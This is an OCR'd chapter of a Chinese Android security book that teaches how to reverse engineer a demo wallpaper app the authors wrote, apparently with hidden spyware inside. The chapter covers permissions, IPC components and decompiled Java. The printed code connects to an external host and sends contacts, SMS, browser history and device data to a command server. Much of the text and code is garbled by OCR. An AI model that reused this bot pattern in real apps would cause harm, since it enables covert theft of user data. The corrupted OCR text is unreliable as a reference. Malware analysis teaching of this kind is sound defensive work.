件 外 ， 很 难 去 验证 这 些 软件 的 可 靠 性 或 难以 确保 这 些 软件 的 功能 不 存在 问题 。 对 于 
个 人 电脑 来 说 ， 可 以 使 用 各 种 共享 软件 、 试 用 软件 或 是 免费 软件 ， 如 今 ， 对 于 移动 
设备 也 是 如 此 ， 而 且 只 需 用 户 点 击 一 下 即 可 安装 这 些 软件 。 每 天 在 移动 应 用 市 场 中 
都 会 出 现 数 以 百 计 的 应 用 软件 ， 这 些 软件 出 自 于 从 顶级 到 新 手 的 各 种 软件 开发 者 。 

对 于 移动 设备 ， 尤 其 是 Android 设备 ， 问 题 就 变 得 更 加 复杂 了 。 由 于 众多 的 
Android 应 用 市 场 没 有 对 发 布 的 应 用 软件 进行 严格 的 安全 审查 (或 设置 软件 发 布 准 
入 门槛 ) ， 这 就 导致 了 恶意 软件 有 机 会 被 用 户 安装 在 自己 的 设备 上 。 对 于 Android 
应 用 来 说 ， 唯 一 的 安全 管控 机 制 似乎 是 在 软件 安装 的 过 程 中 ， 用 户 被 明确 地 询问 是 
否 同 意 软件 所 请 求 的 权限 。 一 旦 得 到 用 户 同 意 安 装 后 ，Android 应 用 程序 将 得 到 用 





























” 道 向 工程 定义 源 自 维基 百科 “ http: //en. wikipedia. org/wiki/Reverse engineering" 。 一 一 原 书 注 
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户 完全 的 信任 。 但 是 ， 用 户 并 不 理解 这 些 安装 的 软件 和 工具 存在 的 所 有 影响 。 考 虑 
到 所 安装 软件 的 复杂 性 以 及 相互 依存 关系 ， 即 使 对 于 经 验 丰富 的 专业 人 员 来 说 ， 要 
想 指出 某 个 软件 包 是 否 值得 信赖 也 是 相当 复杂 的 事情 。 在 这 种 情况 下 ， 逆 向 工程 就 
变 得 至 关 重 要 了 。 

逆向 工程 包括 一 组 技术 ， 可 以 识别 软件 是 如 何 工作 的 。 一 般 情 况 下 ， 对 于 逆向 
工程 来 说 达成 这 种 目的 无 需 访问 软件 的 源码 。 

逆向 工程 可 以 有 效 地 对 软件 的 安全 性 进行 分 析 ， 原 因 如 下 : 

1) 识别 恶意 软件 /代码 : 安全 公司 可 以 使 用 逆向 工程 技术 识别 一 段 特定 的 悉 
意 程序 (如 病毒 、 蠕 虫 程 序 等 ) 如 何 运 作 ， 从 而 针对 其 开发 应 对 方案 。 逆 向 工程 
也 可 以 帮助 开发 试探 程序 ， 在 用 户 被 影响 之 前 ， 识 别 出 可 能 出 现 的 恶意 软件 行为 。 

2) 发 现 缺 陷 / 安 全 问题 : 道 向 工程 是 安全 专业 人 员 最 后 使 用 的 一 项 技术 ， 用 
来 验证 软件 中 是 否 存在 能 够 被 人 利用 的 缺陷 或 问题 。 例 如 ， 可 以 使 用 逆向 工程 确定 
应 用 程序 是 否 为 黑客 提供 了 大 量 的 有 用 信息 或 在 堆 / 栈 中 存在 可 预测 的 数据 。 

3) 识别 软件 中 的 计划 外 功能 : 逆向 工程 还 可 以 供 特定 软件 的 开发 者 确定 软件 
中 是 否 存在 软件 设计 计划 之 外 的 功能 。 如 果 存 在 ， 开 发 者 就 可 以 采取 恰当 的 方法 组 
解 这 些 问题 。 

逆向 工程 技术 已 经 存在 了 很 长 时 间 。 比 如 ， 竞 争 对 手 试 图 对 流行 的 产品 进行 逆 
向 工程 ， 各 国政 府 试图 对 敌对 国 的 国防 拉 术 进行 逆向 工程 ， 数 学 家 试图 对 工程 加 密 
算法 进行 逆向 工程 等 。 然 而 ， 需 要 注意 的 是 ， 本 章 对 Android 应 用 程序 进行 的 逆向 
工程 并 不 是 出 于 任何 其 他 非法 目的 。 

对 应 用 软件 进行 逆向 工程 是 非法 的 。 因 为 这 侵犯 了 开发 者 及 相关 公司 的 版 权 ， 
应 用 软件 受到 著作 权 法 和 数字 版 权 的 保护 ， 任 何以 非法 目的 从 事 逆向 工程 的 做 法 将 
受到 相关 法 律 的 制裁 。 本 章 演 示 逆 向 工程 技术 的 目的 只 有 一 个 ， 就 是 用 来 破解 和 分 
析 恶 意 软件 ， 指 导读 者 如 何 对 可 能 的 恶意 软件 进行 审查 ， 从 而 将 其 从 合法 软件 /下 
载 软件 中 区 分 出 来 。 

Android 提供 了 一 些 有 用 的 工具 辅助 进行 逆向 工程 。 前 面 章节 已 经 介绍 了 一 些 
工具 ,本章 将 介绍 另外 一 部 分 工具 。 本 章 将 通过 一 个 应 用 程序 引导 用 户 使 用 逆向 工 
程 技术 分 析 应 用 程序 的 恶意 行为 ， 该 应 用 程序 是 本 书 作者 编写 的 ， 仅 用 于 进行 分 析 
演示 之 目的 。 






































6.2 恶意 软件 


亚 意 软件 〈 也 可 称 为 恶意 的 程序 或 应 用 ) 是 一 种 软件 程序 代码 ， 旨 在 干扰 正常 
的 使 用 ， 收 集 系 统 / 用 户 的 敏感 和 /或 未 经 授权 的 信息 。 恶 意 软 件 包括 病毒 、 蠕 虫 、 木 
马 、 间 谍 软 件 、 按 键 记录 程序 、 广 告 软件 、rootkit 后 门 ， 以 及 其 他 恶意 程序 代码 。 

一 般 ， 具 有 下 述 行为 的 软件 被 归 为 恶意 软件 : 
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1) 干扰 正常 使 用 : 这 类 软件 一 般 设 计 用 来 为 阻止 用 户 正常 使 用 系统 。 其 行为 
包括 占用 所 有 的 系统 资源 〈 如 磁盘 空间 、 内 存 、CPU 计算 周期 ) ， 以 及 在 网 络 上 放 
置 大 量 的 数据 流量 消耗 网 络 带宽 等 。 

2) 未 经 授权 收集 手机 敏感 信息 : 这 类 恶意 代码 试图 盆 取 有 价值 的 〈 敏 感 的 ) 
言 息 ， 例 如 按键 记录 程序 ， 它 会 跟踪 用 户 按 键 ， 并 将 按键 记录 信息 提供 给 攻击 者 。 
当 用 户 输入 敏感 的 信息 ， 例 如 SSN 、 信 用 卡号 码 ， 以 及 密码 等 ， 这 些 信息 都 可 能 被 
记录 并 发 送 给 攻击 者 。 

3) 在 系统 上 执行 未 经 用 户 授权 的 操作 : 这 类 软件 会 在 系统 /其 他 应 用 程序 上 
执行 其 主张 用 途 之 外 的 功能 。 例 如 ， 壁 纸 应 用 程序 试图 从 银行 应 用 程序 上 读 取 敏感 
资料 或 修改 文件 ， 从 而 影响 其 他 的 应 用 程序 。 





6.3 识别 Android 恶意 软件 





本 节 主 要 讨论 如 何 识别 那些 归属 于 Android 设备 恶意 软件 范畴 的 行为 。 在 前 面 
章节 中 已 经 了 解 到 ， 这 些 行为 可 能 出 现在 操作 系统 层面 (如 Android/Linux 内 核 , 
还 可 能 出 现在 应 用 程序 层面 。 问 题 是 如 何 去 检 测 Android 系统 上 的 可 疑 应 用 并 对 它 
们 进行 分 析 呢 ? 本 节 将 为 安全 专业 人 员 提 供 一 些 用 于 识别 应 用 程序 可 疑 行 为 和 对 应 
用 程序 进行 评估 的 方法 。 以 本 书 作 者 编写 的 一 款 恶 意 软件 为 例 ， 通 过 对 其 进行 研 
究 ， 列 举 方法 如 下 : 

1. 源码 /功能 

这 是 识别 潜在 的 可 疑 应 用 程序 的 第 一 步 。 如 果 Android 应 用 程序 不 是 从 正规 软 
件 下 载 源 上 获得 的 (例如 ， 从 某 一 网 站 而 不 是 Android 应 用 市 场 上 下 载 的 ) ， 就 需 
要 仔细 地 检查 该 应 用 程序 的 功能 。 在 很 多 情况 下 ， 如 果 用 户 已 经 把 应 用 程序 安装 到 
移动 设备 上 ， 就 不 能 进行 这 种 检查 了 。 但 是 ,不论 在 什么 情况 下 ， 都 必须 要 注意 应 
用 软件 主张 的 功能 ， 这 一 点 是 很 重要 的 ， 在 步骤 2 ~4 中 将 对 这 一 点 进行 分 析 。 

2. 权限 

现在 ,假设 已 经 分 析 并 了 解 了 应 用 程序 可 能 具有 的 行为 ， 接 下 来 需要 检查 应 用 
程序 请 求 的 权限 。 应 用 程序 执行 的 操作 应 当 与 其 请 求 的 权限 相 匹 配 。 假 如 应 用 程序 
请 求 的 权限 超出 了 其 功能 所 需 的 权限 ， 就 需要 对 其 进行 进一步 的 评估 。 

3. 数据 

根据 应 用 程序 的 请 求 权 限 ， 可 以 得 出 它 能 够 访问 的 各 种 权限 范围 内 的 数据 类 
别 。 根 据 这 一 原则 ， 查 看 应 用 程序 对 数据 的 访问 操作 是 否 同 应 用 程序 在 设计 上 的 预 
期 功能 相 匹配 ? 应 用 程序 是 否 访问 了 其 主张 的 功能 并 不 需要 的 数据 ， 应 用 程序 中 是 
否 包 含 访问 越权 数据 的 操作 ? 

4. 联网 

本 方法 的 最 后 一 个 步骤 是 分 析 应 用 程序 的 源码 ( 稍 后 介绍 )。 检 查 人 员 需 要 确 
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定 应 用 程序 是 否 开 启 














套 接 字 (以 及 和 哪些 服务 器 连接 ) ， 弄 清 什么 类 型 的 数据 被 


Hl 
传输 (数据 传输 是 否 安 全 ) ， 以 及 看 它 是 否 使 用 了 广告 支持 库 ， 等 等 。 





6.4 Android 应 用 程序 逆向 工程 方法 





在 上 一 节 中 ， 主 要 介绍 了 可 疑 Android 应 用 程序 的 评估 方法 ， 本 节 将 使 用 这 些 








方法 ， 对 一 个 壁纸 应 用 程序 展开 分 析 。 同 样 ， 该 应 用 程序 也 是 本 书 作者 编写 的 。 


步骤 1: 审查 应 用 程序 的 源码 和 功能 


以 本 书 作者 编写 的 壁纸 应 用 程序 Cute Puppies 为 例 进行 测试 ， 该 应 用 程序 可 从 
作者 网 站 (www. androidinsecurity. com ) 或 Android 应 用 市 场 上 下 载 。 如 果 应 用 程序 




















只 能 从 非 标准 源 〈 例 如 ， 从 网 站 上 ) 上 下 载 ， 毫 无 疑问 必须 对 这 样 的 应 用 程序 做 
进一步 的 审查 。 该 应 用 程序 在 模拟 顺 上 安装 完 后 ， 看 起 来 和 其 他 流行 的 壁纸 应 用 程 








序 无 异 ， 程 序 安装 过 程 和 该 应 用 程序 界面 如 图 6. 1 和 图 6. 2 所 示 。 


dii — platform-tools — bash — 80x24 . 
anmmisra-mac:platform-tools Anmol$ ls 


NOTICE . txt dexdump renderscript 
aapt dx source.properties 


adb lib 
aidl llvm-rs-cc 





anmmisra-mac:platform-tools Anmol$ adb install -/Inbox/CutePuppiesWallpaper.apk 


-bash: adb: command not found 


anmmisra-mac:platform-tools Anmol$ ./adb install -/Inbox/CutePuppiesWallpaper.ap 


k 
1573 KB/s (628797 bytes in 0.390s) 
pkg: /data/local/tmp/CutePuppiesWallpaper.apk 
Success 
anmmisra-mac:platform-tools Anmol$ 





: = 


Alarm Clock AppDetector Browser Calculator 


EM NM. 


Camera CarHome Contacts Custom 
Locale 


Dev Tools Email Gallery 


图 6.2 应 用 程序 界面 截图 
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步骤 2: 审查 应 用 程序 使 用 的 权限 

在 第 4 章 已 经 介绍 了 Android 的 权限 ， 并 且 在 第 5 章 介 绍 了 如 何 访问 Mani- 
fest. xml 文件 〈 该 文件 列 出 了 应 用 程序 所 需 权 限 列 表 ) 。 在 Cute Puppies 壁纸 应 用 程序 
上 使 用 apktool 工具 获取 该 应 用 请 求 的 权限 列表 ， 操 作 过 程 如 图 6.3 和 图 6.4 所 示 。 








pentestusri8tools-gibbons-vm-2:-/Android/android-sdk/tools$ apktool decode CutePuppiesWallpaper.apk ./puppies/. 
I: Baksmoling... 


: Looding resource tab 
: Decoding resources.. 

: Loading resource table from file: /home/pentestusri/apktool/fromework/1.apk 
: Copying assets and lib 
entestusrietools-gibbons-vm-2:-/Android/android-sdk/tools$ 











T 











图 6.3 使 用 apktool 工具 提取 AndroidManifest. xml 文件 





«uses-permission androi 

<uses-permission android: 

<uses-permission android: z á 

«uses-permission android:name=" roid.permission.SET WALLPAPER" /» 


<uses-permission android:nar roid.permission.READ.CONTAC 
«uses-permission android:name-"android.permission,WRITE CONTACTS" /> 
«uses-permission android: roid.permission.RECEIVE SMS" /> 
«uses-permission android:nam ndroid.permission.READ.OWNER.DATA" /> 

ission androtd:n om.android.browser.permission.READ.HISTORY BOOKMARKS" /> 
com android.browser.permission.WRITE HISTORY BOOKMARKS" /> 
pentestusrietools-gibbons -vm-2: -/Android/android-sdk/tools/puppies$ | 


«uses-permission android: 





图 6.4 — AndroidManifest 文件 列 出 的 壁纸 应 用 程序 所 需 权 限 
从 图 6.4 中 可 见 ， 该 应 用 程序 似乎 申请 了 过 多 的 权限 。 表 6. 1 对 这 些 请 求 的 权 
限 进 行 了 总 结 ， 包 括 这 些 权 限 在 Android 设备 上 的 用 途 ， 以 及 是 否 是 壁纸 应 用 程序 
所 必需 的 。 很 显然 ， 该 应 用 程序 请 求 的 权限 远 多 于 其 所 需 的 权限 。 
表 6.1 AndroidManifest 文件 中 列 出 的 壁纸 应 用 程序 所 需 权限 
权 限 用 途 是 否 必须 ? 





















































可 有 可 无 。 应 用 程序 的 一 些 功 
能 可 能 需要 该 权限 设置 壁纸 











允许 应 用 程序 接收 ACTION_BOOT_ 
RECEIVE BOOT COMPLETED |COMPLETED 事件 ， 该 事件 于 系统 引 
导 完 毕 后 广播 























可 有 可 无 。 应 用 程序 可 能 需要 该 
权限 连接 外 部 服务 器 获取 新 的 壁纸 











INTERNET 允许 应 用 程序 开启 网 络 套 接 字 















































VNESE ea REEE N 
^m x. MHE Ta 位 

ACCESS COARSE LOCATION ”| 如 移动 蜂窝 通信 基站 ID 8», Wi-Fi 位 dd ME 

置信 息 






























































允许 应 用 程序 获取 精准 的 位 置信 息 , 不 需要 。 应 用 程序 无 需 位 置 
如 GPS 数据 





ACCESS_FINE_LOCATION 
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(5) 
p m 途 是 否 必须 ? 
允许 以 只 读 的 方式 获取 手机 状态 | 不 需要 。 应 用 程序 无 需 读 取 电 


READ. PHONE, STATE 




















话 状态 信息 





SET WALLPAPER 














允许 应 











程序 设置 壁纸 


需要 。 该 权限 符合 应 


功能 














] 程 








WRITE_CONTACTS 








人 允许 应 用 

















用 户 联系 人 资料 








程序 修改 〈 但 不 可 读 取 ) 





不 需 HH 。 应 用 





系 人 资料 


无需 访 问 


TÉ 





READ. CONTACTS 

















允许 应 





程序 读 取 





户 联 系 人 资料 























不 需要 。 应 用 
系 人 资料 


程序 


无 需 访问 





RECEIVE_SMS 























允许 应 








程序 读 取 SMS 短信 息 











不 需要 
SMS 短信 息 








程序 无 需 访 问 


4j 





READ OWNER, DATA 





和 定义 权限 











可 有 可 无 。 看 起 来 可 疑 。 不 过 应 




















程序 有 时 确实 需要 读 取 























户 资 料 


PB 





READ. HISTORY BOOKMARKS 














允许 应 











户 


d 


程序 以 只 读 的 方式 读 取 
1 览 絮 浏览 历史 和 书签 























au 


EE HH 
不 需要 。 





应 用 





程序 无 需 访 问 


历 





WRITE. HISTORY, BOOKMARKS 











允许 应 用 

















用 户 浏览 器 浏览 





an 








程序 修改 〈 但 不 可 读 取 ) 
历史 和 书签 














不 需要 。 该 应 


问 历史 数据 


步骤 3: 审查 应 用 程序 使 用 的 进程 间 通 信 (IPC) 机 制 
接 下 来 分 析 应 用 程序 中 使 用 的 IPC 机 制 ， 如 图 6.5 所 示 。 从 AndroidManifest 文 
件 中 ， 可 以 看 到 Intent 和 Intent 过 滤器 ， 现 在 来 分 析 一 下 和 这 些 Intent 相关 联 的 An- 
droid 组 件 ， 如 Service, Receiver, Activity 等 。 表 6. 2 描述 了 该 应 用 程序 中 定义 的 


IPC 机 制 及 对 它们 的 分 析 。 


«manifest android 
xmins :androide"htt 

















«receiver android:name-"com.adam.CutePuppiesWallpaper.BotBroodcastHandler"» 


xintent-filter» 


«action android:name. 


indroid.intent.action.BOOT COMPLETED" /> 


«category android:name-"android.intent.category.HOME" /> 


«/intent-filter» 
«/receiver» 


«receiver android;names"com, adam, CutePuppi esWallpaper. BotSMSHandler"» 


«intent-filter» 


«action android:names"android.provider.Telephony.SMS RECEIVED" /> 


«/intent-filter» 
«receiver» 


«service android:names"com.adam 


*intent-filter» 


«action android:names"ci 


«/intent-filter» 
«/service» 


CutePuppiesWiclipaper.BotService"» 


„adom. CutePuppiesiallpaper.BotService" /> 


«activity android:labels"&string/app name" android:name-" .CutePuppiesWallpaper"» 


<i ilter> 


n android:name="android. intent action, MAIN" 


/> 


«category android:names"android.intent.category.LAUNCHER" /> 


«/intent-filter» 
«/activity» 
«/appiication» 


图 6.5 Cute Puppies 壁纸 应 用 程序 中 使 用 的 IPC 机 种 


" android:debuggable-"true" 








c 





程序 不 需要 i 
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表 6.2 Cute Puppies 壁纸 应 用 程序 使 用 的 IPC 机 制 
IPC 组 件 Intent 过 滤器 分 析 
RECEIVER 


com. adam. CutePuppiesWallpaper. 


BotBroadcastHandler 


android. intent. action. 


BOOT COMPLETED 


统 


接收 手机 启动 引导 完毕 时 ， 系 
发 出 的 广播 事件 。 非 必须 











RECEIVER 


com. adam. CutePuppiesW allpaper. 


BotSMSHandler 


android. provider. 


Telephony. SMS_RECEIVED 





Ilin} 
pum 














He ZR EXT MCI SMS 信息 
件 的 广播 。 非 必须 











SERVICE 


com. adam. CutePuppiesWallpaper. 


BotService 


com. adam. CutePuppiesWallpaper. 


BotService 


后 台 服 务 。 可 能 会 需要 





ACTIVITY 
CutePuppiesWallpaper 





android. intent. action. MAIN 





























用 程序 启动 后 调 








zm 





的 主 Activity 





E 


步骤 4: 分 析 源 码 审查 开放 的 端口 、 共 享 / 传 输 的 数据 ， 以 及 socket 连接 等 
反 编 译 apk 获取 Java 源码 
最 后 ， 将 应 用 程序 反 编 译 成 可 读 的 Java 代码 。 然 后 审查 该 代码 以 便 更 深入 地 
了 解 应 用 程序 的 行为 。Android 包 文 件 (apk) 是 一 个 压缩 文件 ， 包 含 一 个 clas- 
ses. dex 的 文件 ， 以 及 一 些 其 他 的 文件 。apk 文件 很 容易 解压 ， 从 中 提取 出 clas- 
ses. dex 文件 。DEX 是 运行 在 Dalvik 虚拟 机 上 的 Java 字 节 但 文件 ， 这 种 文件 经 过 优 
化 非常 适合 在 小 型 的 设备 上 运行 。dex2jar 工具 2 用 于 将 classes. dex 文件 转换 成 jar 
文件 ， 如 图 6.6 所 示 。 产 生 的 jar 文件 可 以 使 用 Java 反 编 译 器 (例如 ,JD TH) 











来 查看 ， 如 图 6.7 所 示 。 









dexzjar classes.dex 
Done. 


pentestusrl@tools-gibbons-vm-2:~/Android/android-sdk/tools/cutepuppies$ 
dex2jar version: translator-0.0.9.7 
-> ciaqsses_dexzjar .jar 


pentestusriétools-gibbons-vm-2:-/Android/android-sdk/tools/cutepuppies$ | 

























. ./dex2jar-0.0.9.7/dex2jar.sh closses.dex 





图 6.6 使 用 dex2jar [ 具 将 classes. dex 文件 转换 成 jar 格式 





分 析 源 码 中 的 开放 端口 、 共 享 /传输 的 数据 ， 以 及 打开 的 socket 
接 下 来 ， 使 用 Java 反 编 译 器 分 析 这 个 jar 文件 。 如 图 6.7 所 示 ,， TE JD- GUI T 
具 中 打开 classes. jar 文件 。 可 见 ， 组 成 该 应 用 软件 Java 架构 (jar 文件 ) 的 类 文件 


如 下 : 


1) BotBroadcastHander。 


2) BotClient。 


3) BotLocationHandler。 








© dex2jar 工具 可 以 从 http: //code. google. com/p/dex2jar/downloads/list 网 站 上 获得 。 一 一 原 书 注 
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"UO HB com.adam.CutePuppiesWallpaper 
Y [jj BetBroadcastHandler 


v eo a [package com.adam.CutePuppiesWallpaper; 





45 ACTION, BOOT : String /*import android.app.Activity; 
@ onReceivelCantext, Intent) : vaid 
b [Jj BetCtient que class CutePuppiesWallpaper extends Activity 
N : f 
K preveja | private Integer{] mThumbIds; 
bo 国 BotSMSListner | public CutePuppiesWallpaper() 
b [f BetService. | t 
b [jj BetWorker i Integeri] arrayOfInteger = new Integeri22]; 
- DERE i arrayOfInteger[0] = Integer.value0f(2130837507) ; 
pia yi m" l arrayDFIntegerll] = Integer. va1ue07[2130837508) ; 
(9) GuePuppieeWitpsper | arrayOfinteger[2] = Integer. value0f(2130837509) ; 
b (Q magendapter i array0fInteger[3] = Integer. value0f(2130837518) ; 
c mThumhids : integer!) i arrayOfInteger[4] = Integer.value0f(2130837511); 
@ CutePuppiesWalipapert) i array0fInteger[5] = Integer.value0f(2138837512); 


i arrayOfInteger[6] = Integer.value0f(2138837505) ; 
|  arrayofInteger[7] = Integer. value0f (2130837506) ; 
arrayOfInteger[8] = Integer.value0f(2138837507) ; 
arrayOfinteger[9] = Integer.value0f(2130837508) ; 
arrayOfInteger[18] = Integer.value0f(2138837589); 
array0fInteger[11] = Integer.value0f(2130837510) ; 
array0finteger[12] = Integer.value0f(2130837511); 
i array0fInteger[13] = Integer.valueQf(2130837512); 
i arrayO0fInteger[14] = Integer.valueQf(2130837505); 
|  arrayOfInteger[15] = Integer. value0f(2130837506) ; 
arrayOfInteger[16] = Integer.value0f(2130837507); 
arrayO0fInteger[17] = Integer.value07(2139837508); 
array0fInteger[18] = Integer. value07(2139837589); 
arrayüfInteger[19] = Integer.value0f(2138837518); 
arrayO0fInteger[20] = Integer.value0f(2130837511); 
arrayO0fIntegeri21] = Integer.value0f(2130837512); 
this.mThumbIds = arrayOfInteger; 


N onCreste(Bundle) : void 
b DR 


public void onCreate{Bundle paramBundle) 
1 


super. onCreate(paramBundle); 

setContentView(2130903041); 

Object localObject = new Intent(); 

((Intent)localübject) .setAction("com.adam.CutePuppiesWallpaper.BotService"); 
i startService((Intent)localObject) ; 

| localübject = WallpaperManager. getInstance{ this); 








图 6.7 使 用 Java 反 编 译 器 查看 jar 文件 内 的 Java 代码 


4) BotSMSHandler。 

5) BotService。 

6) BotWorker。 

7) CutePuppiesWallpaper。 

8) Rs 

在 上 述 几 个 类 文件 中 ， 应 用 程序 的 Main Activity 类 似乎 定义 在 CutePup- 
piesWallpaper 文件 内 ， a JD- GUI 工具 来 看 一 下 该 文件 的 内 容 。 

CutePuppiesWallpaper. class 类 文件 分 析 : 

a mc o i a 
些 辟 纸 资源 定义 在 资源 文件 R 类 中 ) 。 然 后 ， 该 类 在 后 台 启 动 了 BotService 后 台 服 
务 。 接 下 来 ， 再 来 看 一 下 BotService. class 

BotService. class 类 文件 分 析 : 

从 图 6. 9 中 可 见 ，BotService 服务 启动 后 ， 首 先 初 始 化 了 一 个 BotClient 客户 端 
对 象 。BotClient 类 的 构造 也 数 的 参数 中 包含 一 个 外 部 URL (BEH k2. homeunix. com) 
和 一 个 socket 端口 : 1500。 然 后 ， 被 初始 化 BotClient 客户 端 对 象 调 用 BotClient 类 
内 部 的 Run() 函数 ， 将 自己 启动 。 下 面 再 来 看 一 下 BotClient. class 文件 ， 分 析 它 
所 定义 的 功能 。 
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BotLocationHandier.class | 





v B Som-adam.CutePupples Wallpaper Rdass | CutePupplesWallpaper.class e BotSMSHandler.class 
国 aorgroadcastHandler Uim ii 
国 BotClient. 





orrayOfInteger[4] = Integer. value0f(2130837511); 
arrayOfInteger[5] = Integer. va1ue0& 2130837512); 
orray0finteger[6] = Integer. value0f(2130837505); 
array0fInteger[?7] = Integer. value0f(2130837506); 
erray0fInteger[8] = Integer. value0f(2130837507); 
array0fInteger[9] = Integer. value0( 2130837508); 
array0finteger[10] » Integer. valueOf(2130837509); 
arrgy0fInteger[11] = Integer. valueOf(2130837510); 
array0fInteger[12] = Integer. vulue0fK 2130837511); 
array0finteger[13] « Integer. value0f(2130837512); 
arrayüfinteger[14] = Integer. volue0f(2130837505); 
arrayOfInteger[15] = Integer. volue0f(2130837506); 
|  array0finteger[16] = Integer. valueOf( 2130837507); 
|  array0finteger[17] = Integer. value(f( 2130837508); 
|  orrayOfinteger[18] - Integer. value0f(2130837509); 
array0finteger[19] - Integer. volueOf( 2130837510); 
|  arrayOfinteger[20] - Integer. valueOft 2130837511); 
array0finteger[21] ~ Integer. volue0f( 2130837512); 
this.ethunbIds = orrayOfInteger; 





} 
i 


1 | public void onCreate(Bundle paramBundle) 
1 
super . onCreate(paramBundle); 
setContentVi ew 2130903041) ; 
Object localObject = new IntentO ; 
C(Intent)localübject) .setAction( "con. adam. CutePuppiesWallpaper .BotService"); 
startServi ce((Intent)local0bject); 
localübject = WallpaperMonager. get Instonce(this); 
GridView localGridVien = (GridView)findVienüyId(2131034112); 
localGridView. setAdapter(new ImogeAdapter(this)); 
localéridView. setünTtemClickListener(new AdapterView.OnItemClickListener((Wal .paperManager)local0bject) 
t 
public void onItemClíck(AdapterView paramAdapterView, View paramView, int paramInt, long paramLong) 
t 


i 1 
this. vol$wn. setResource(CutePuppiesilallpoper this. mThumbIds[paranInt] int Value); 
i return; 
i } 
catch 《IOException local IOException) 
t 

while (true) 

local I0Exception.printStackTrace(); 











EE 











6.8 CutePuppiesWallpaper 类 


| classes dex2jarjar @ uiii 





v Ei com.adam.CutePuppiesWallpaper 





| BotService.class e 














> [R sotiroadcastiandier [package com. adam. CutePuppiesiallpaper 
> [Ñ BotCliem 
> [Ë BotLocationHandter &|import android.app.Service; 
» [Ñ BotSMSHandler | 
» [È BotSMSListner public class BotService extends Service 
» [D BotService. t 
P [Ñ BotWorker | public static final String LOG TAG = "MCS. BOT. BotService"; 
> CutePuppiesWallpaper 
» E | public IBinder onBind(Intent paramintent) 
| 
| 4 
| return null; 
| 
|| 
| | public void onCreate() 
|t 
| — super.onCreate(; 
H 


public void onDestroyO) 
t 
super. onDestroyO ; 


4 


public void onStart(Intent paramIntent, int paramInt) 
i 
Super.onStart(paramIntent, paramInt); 
| | Context localContext = getBaseContextO ; 
Log. v("MCS BOT. BotService", "Service Started"); 
new BotClient("k2.BORBURD. com", 1500, getContentResolverO,, localContext).RunO ; 
H 





} 





6.9  BotService. class 


BotClient. class 类 文件 分 析 : 

BotClient. Run() 函数 调用 时 ， 在 该 孔 数 内 部 依次 调用 了 ConnectToServer( ) PK 
数 和 MasterCommandProcessor( ) PK, ConnectToServer( ) PATE this. port 端口 上 
建立 了 一 个 指向 this. hostUri 的 socket 连接 ， 然 后 创建 输入 输出 流 ， 从 该 socket XE 
接 通道 中 读 写 数据 ， 如 图 6. 10 所 示 。 接 下 来 调用 MasterCommandProcessor( ) 构造 
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函数 初始 化 并 启动 MasterCommandProcessor 线程 。 在 MasterCommandProcessor 线程 
类 的 Run () 函数 中 ， 将 来 自 服 务 器 的 命令 读 和 人 到 localObjectl 变量 中 ， 如 
图 6. 11 所 示 。 然 后 将 变量 localObjectl 的 值 同 整数 值 101 ~ 106 进行 比 对 检查 。 根 
据 该 值 ， 调 用 BotWorker 类 中 对 应 的 函数 ,返回 请 求 的 远程 服务 器 信息 。 例 如 ， 当 
变量 localObjectl 的 值 为 101 时 ， 返 回 bwr。 


| BotClient.class o 





| public BotClient(String paramString, int poranint, ContentResolver ont tie Context i par 
| 4 

this.port = Integer. valueOf(paramInt); 

this.hostUri » paromString; 

this.cr = paramContentResolver; 

this.context « paromContext; 

this.bwe » new BotWorker(this.cr, this. context); 
| 3 


| poblic void BESO 
E 


try 
{ 
this.socket = new Socket(InetAddress.getByName(this.hostUri).getHostName(), this.port. intYalue()); 
this.iStream = new ObjectInputStream(this. socket .getInputStream()); 
this.ooSteeom « new ÜbjectOutputStream(this. socket . getQutputStream()); 
Log. v("MCS. BOT BotClient", "Connected to Master Chief Sunday*n"); 
return; 
H 
catch (10Exception locallüException) 
t 
while (true) 
tocal IOException. printStackTrace(); 








| 3 
| 了 


public void Run 


RUE: 
«new Thread(new MasterCommandProcessor()).startO); 
} 


| public class MasterCommandProcessor extends Thread 
I 
! pubtic MasterCo|mandProcessor() 
t 
} 


public void SendDataToMaster(Object paramübject) 
t 
try 
1 
BotClient.this.ooStream.writeObject(paramObject); 
return; 











图 6. 10  BotClient. class- ConnectToServer( ) 函数 


如 图 6.12 所 示 ， 调 用 GetContactInfo 函数 获取 联系 人 信息 并 将 其 发 送 到 远程 服 
务 器 。SendDataToMaster( ) 函数 用 于 将 数据 写 人 到 Socket 输出 流 ， 将 数据 发 送 到 远 
TUI S kE o 

BotWorker. class 类 文件 分 析 : 

如 图 6. 12 和 图 6.13 所 示 ， 根 据 变 量 localObjectl 的 值 ，BotClient 类 调用 Bot- 
Worker 类 中 的 各 种 相应 函数 。 例 如 ， 当 localObjectl 为 101 时 ，BotClient 调用 Bot- 
Worker. GetContactInfo( ) PK, TE BotWorker 类 中 定义 的 该 函数 的 实际 功能 是 从 设 
备 上 获取 联系 人 信息 。 同 样 ， 该 类 还 定义 了 一 些 其 他 的 函数 ， 用 来 获取 浏览 器 历史 








96 Android 系统 安全 与 攻防 





BotClient.class | 





| public class MasterCommandProcessor extends Thread 


|i 
| public MasterCommandProcessor() 
| t 

| } 

| 


| public void SERBDGEGÍGNGSRERCObject paramObject) 


| 
[| t 
| tm 
| t 
| BotClient.this.ooStreom.writeObject(paramObject); 
| return; 
| } 
| catch (Exception localException) 
| 1 
while (true) 
Log. v("MCS BOT BotClient", "Server Closed connection"); 
1 





public void run() 

| t 

| int i = 6; 

| if C!BotClient.this.bRunning) 
| return; 

| | while (true) 

| t 


| 

| 

|| 
IE 
| 

| 


try 
1 

| Object localObjectl = (String)BotClient.this.iStream.read0bject(); 
| if (CCtring)localübject1).equals("")) 

| | break; 

| i = Integer .parseInt((String)localO0bject1); 

| Log. v("MCS. BOT. BotClient", "command recieved:" + i); 

| localObject1 = new Hashtable(); 

| switch (i) 

| 1 
| 

| 

| 





paf default: 

B SendüataToMaster (1ocal0b ject1); 
| case 101: 

cose 102: 

case 105: 

| | cose 104: 





图 6. 11  BotClient. class- MasterCommandProcessor( ) 函数 


信息 、 设 备 信息 、 安 装 的 软件 信息 ， 以 及 SMS 信息 ， 如 图 6.14 所 示 。 表 6.3 列举 
了 所 有 在 BotWorker 类 内 部 定义 的 函数 。 

表 6.3  BotWorker 类 定义 的 函数 
名 称 


BotWorker (ContentResolver paramContentResolver, Context 








BotWorker 类 的 构造 函数 ( 见 图 6. 15) 


paramContext ) 











pid 


GetBrowserHistory ( ) 共 浏 览 器 历史 信息 ( 见 图 6. 16) 

联系 人 信息 ( 见 图 6. 17) 

